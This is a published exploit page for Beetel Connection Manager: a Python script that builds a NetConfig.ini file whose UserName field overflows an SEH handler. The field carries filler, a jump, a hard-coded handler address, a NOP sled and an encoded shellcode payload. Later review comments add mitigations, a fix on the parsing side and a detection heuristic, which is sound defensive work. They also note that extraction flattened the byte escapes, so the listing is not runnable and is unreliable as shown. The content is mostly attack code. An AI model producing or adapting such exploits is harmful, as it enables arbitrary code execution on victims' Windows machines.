
Beetel Connection Manager SEH Buffer Overflow *youtube

Posted on 15 October 2013

#!/usr/bin/python
# Proof-of-concept file generator. It builds the text of a connection-profile
# file named "NetConfig.ini" and writes it to the current directory. Every
# field is short or empty except UserName, which carries a long concatenated
# value (header + filler + 4-byte value + packed address + padding + payload).
# Per the author's header below, the target is Beetel Connection Manager and
# the bug class is an SEH buffer overflow.
#
# NOTE(review): this listing was flattened during extraction. String literals
# are reproduced exactly as they appear on the page (e.g. "x41" is the three
# characters x, 4, 1 here, not an escape sequence), and the script uses
# Python 2 print statements. It is not runnable as shown.
#
# NOTE(review): the vulnerable code is the application's reader for this file,
# which the page does not show. The durable fix is on that side: bound the
# length of UserName (and every other field) before copying it into a
# fixed-size buffer. Building with /SAFESEH and enabling SEHOP, DEP and ASLR
# raises the cost of this bug class; only Windows XP SP3 is listed as tested.
#
# NOTE(review): for detection, a NetConfig.ini whose UserName= value runs to
# hundreds of bytes or contains non-printable bytes is not a plausible
# credential and is worth alerting on.
from struct import pack
# Exploit Title: Beetel Connection Manager SEH Buffer Overflow
# Software for usb wireless
# Homepage:http://www.beetel.in/business-solutions/international-business/3g-products/g31-3g-data-card
# Version:PCW_BTLINDV1.0.0B04
# Software Link:http://www.mediafire.com/download/wdp05zlhzk0kgx4/Beetel+Connection+Manager_PCW_BTLINDV1.0.0B04.rar
# Poc video: http://www.youtube.com/watch?v=nrQb0pVwi8U&feature=youtu.be
# Found: 12.10.2013
# Published:12.10.2013
# Exploit Author: metacom
# Tested on: Windows XP sp3 En
# RST

# Output file name. NOTE(review): `file` shadows the Python 2 builtin of the
# same name for the rest of the script.
file="NetConfig.ini"
# Filler: the literal repeated 453 times.
buffer="x41" * 453
# Value the author calls `jump`; it sits immediately before `seh` in the
# concatenation below.
jump="xebx4axffxff"
# Hard-coded 32-bit value packed little-endian. The page does not say which
# module or instruction sequence this address refers to.
seh=pack('<I',0x0105E2F6)
# Padding: the literal repeated 80 times.
nops="x90" * 80
# Payload bytes, written as adjacent string literals that Python concatenates.
# The page does not state what this payload does.
shell=("xbax50x3exf5xa5xdaxd7xd9x74x24xf4x5bx31xc9xb1"
"x33x83xc3x04x31x53x0ex03x03x30x17x50x5fxa4x5e"
"x9bx9fx35x01x15x7ax04x13x41x0fx35xa3x01x5dxb6"
"x48x47x75x4dx3cx40x7axe6x8bxb6xb5xf7x3dx77x19"
"x3bx5fx0bx63x68xbfx32xacx7dxbex73xd0x8ex92x2c"
"x9fx3dx03x58xddxfdx22x8ex6axbdx5cxabxacx4axd7"
"xb2xfcxe3x6cxfcxe4x88x2bxddx15x5cx28x21x5cxe9"
"x9bxd1x5fx3bxd2x1ax6ex03xb9x24x5fx8exc3x61x67"
"x71xb6x99x94x0cxc1x59xe7xcax44x7cx4fx98xffxa4"
"x6ex4dx99x2fx7cx3axedx68x60xbdx22x03x9cx36xc5"
"xc4x15x0cxe2xc0x7exd6x8bx51xdaxb9xb4x82x82x66"
"x11xc8x20x72x23x93x2ex85xa1xa9x17x85xb9xb1x37"
"xeex88x3axd8x69x15xe9x9dx86x5fxb0xb7x0ex06x20"
"x8ax52xb9x9exc8x6ax3ax2bxb0x88x22x5exb5xd5xe4"
"xb2xc7x46x81xb4x74x66x80xd6x1bxf4x48x37xbex7c"
"xeax47")
# Prefix of the UserName value. Read as hex byte values, it spells "http://"
# followed by eight 'A' bytes.
header="x68x74x74x70x3ax2fx2fx41x41x41x41x41x41x41x41"
# Full UserName value, concatenated in this fixed order.
xploit=header + buffer + jump + seh + nops + shell

# Despite its name, `eip` is just the text of the profile file: a section
# header followed by key=value fields. Only UserName carries attacker data.
# NOTE(review): each field ends with a one-space string as shown on this page,
# presumably a line separator lost in extraction (TODO confirm).
eip="[SEH Buffer Overflow] "
eip+= "Name=Edit Me" + " "
eip+= "UserName=" + xploit + " "
eip+= "UserPass=" +" "
eip+= "DialNum=" + " "
eip+= "IsAutoGetAPN=1" + " "
eip+= "APN=" + " "
eip+= "IsAutoGetDNS=1" + " "
eip+= "MainDNSaddr=" + " "
eip+= "AltDNSAddr=" + " "
eip+= "IsAutoGetPDP=1" + " "
eip+= "pdpAddr=" + " "
eip+= "pdpType=IP" + " "
eip+= "AuthType=PAP" + " "
eip+= "askUserAndPass=0" + " "
eip+= "SaveuserAndPass=0" + " "
eip+= "IsDfault=0" + " "
eip+= "DeniEditDelete=0" + " "

# Write the profile text to disk in text mode ("w").
# NOTE(review): the bare `except:` hides the real cause of any failure, and
# the handle is not closed if write() raises.
# NOTE(review): the string literal in the first print is split across two
# lines on this page; it is reproduced unchanged.
try:
    print "[*] 
Creating exploit file... "
    writeFile = open (file, "w")
    writeFile.write( eip )
    writeFile.close()
    print "[*] File successfully created!"
except:
    print "[!] Error while creating file!"

 
